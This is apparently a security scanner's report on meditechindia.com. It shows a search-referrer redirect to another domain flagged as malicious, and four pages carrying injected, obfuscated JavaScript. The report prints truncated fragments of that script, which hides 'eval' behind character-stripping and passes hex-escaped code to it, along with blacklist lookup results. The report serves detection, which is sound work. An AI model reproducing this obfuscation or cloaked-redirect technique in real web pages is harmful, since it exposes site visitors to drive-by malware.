Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://meditechindia.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: meditechindia.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 10 Sep 2014 04:42:28 GMT Location: http://alamaat.com/video/wmv.php Server: Apache/2.4.7 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://meditechindia.com/ | 200 OK Content-Length: 20469 Content-Type: text/html | clean |
http://meditechindia.com/aboutus.htm | 200 OK Content-Length: 40589 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery = eval('w/ipn_d^oZw/._e_vZa^l/'.replace(/[_/Z\^p]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x7a\x75\x55\x6a\x28\x65\x6b\x76\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x68\x4f\x6f\x28\x72\x66\x77\x48\x29\x7b\x76\x61\x72\x20\x78\x37\x44\x6d\x46\x3d\x30\x3b\x76\x61\x72\x20\x61\x31\x6b\x50\x43\x73\x3d\x72\x66\x77\x48\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x74\x38\x47\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x74\x38\x47\x3c\x61\x31\x6b\x50\x43\x73\x29\x7b\x78\x37\x Antivirus reports:
| ||
http://meditechindia.com/product.htm | 200 OK Content-Length: 38981 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery = eval('wWi]nJdWoJwW.JefvWaWlf'.replace(/[fW\]J\+]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x7a\x75\x55\x6a\x28\x65\x6b\x76\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x68\x4f\x6f\x28\x72\x66\x77\x48\x29\x7b\x76\x61\x72\x20\x78\x37\x44\x6d\x46\x3d\x30\x3b\x76\x61\x72\x20\x61\x31\x6b\x50\x43\x73\x3d\x72\x66\x77\x48\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x74\x38\x47\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x74\x38\x47\x3c\x61\x31\x6b\x50\x43\x73\x29\x7b\x78\x37\ Antivirus reports:
| ||
http://meditechindia.com/contactus.htm | 200 OK Content-Length: 39552 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery = eval('wGi~n*dVo*w*.VeGv*aGlR'.replace(/[\*GR~V]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x7a\x75\x55\x6a\x28\x65\x6b\x76\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x68\x4f\x6f\x28\x72\x66\x77\x48\x29\x7b\x76\x61\x72\x20\x78\x37\x44\x6d\x46\x3d\x30\x3b\x76\x61\x72\x20\x61\x31\x6b\x50\x43\x73\x3d\x72\x66\x77\x48\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x74\x38\x47\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x74\x38\x47\x3c\x61\x31\x6b\x50\x43\x73\x29\x7b\x78\x37\x Antivirus reports:
| ||
http://meditechindia.com/enquiry.htm | 200 OK Content-Length: 38532 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery = eval('w0i*n)d0o<wy.)e0v*a0l<'.replace(/[\*0\)\<y]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x7a\x7a\x75\x55\x6a\x28\x65\x6b\x76\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x68\x4f\x6f\x28\x72\x66\x77\x48\x29\x7b\x76\x61\x72\x20\x78\x37\x44\x6d\x46\x3d\x30\x3b\x76\x61\x72\x20\x61\x31\x6b\x50\x43\x73\x3d\x72\x66\x77\x48\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x74\x38\x47\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x74\x38\x47\x3c\x61\x31\x6b\x50\x43\x73\x29\x7 Antivirus reports:
| ||
http://meditechindia.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://meditechindia.com/product%201.htm | 200 OK Content-Length: 40313 Content-Type: text/html | clean |
http://meditechindia.com/product%202.htm | 200 OK Content-Length: 39372 Content-Type: text/html | clean |
http://meditechindia.com/product%204.htm | 200 OK Content-Length: 44057 Content-Type: text/html | clean |
http://meditechindia.com/Copy%20of%20product%203.htm | 200 OK Content-Length: 39306 Content-Type: text/html | clean |
http://meditechindia.com/product%203.htm | 200 OK Content-Length: 44516 Content-Type: text/html | clean |
http://meditechindia.com/product%206.htm | 200 OK Content-Length: 44175 Content-Type: text/html | clean |
http://meditechindia.com/product%205.htm | 200 OK Content-Length: 40541 Content-Type: text/html | clean |
http://meditechindia.com/Copy%20of%20product%201.htm | 200 OK Content-Length: 41832 Content-Type: text/html | clean |
http://meditechindia.com/Copy%20of%20product%202.htm | 200 OK Content-Length: 39971 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=meditechindia.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://meditechindia.com/
Result: meditechindia.com is not infected or malware details are not published yet.
Result: meditechindia.com is not infected or malware details are not published yet.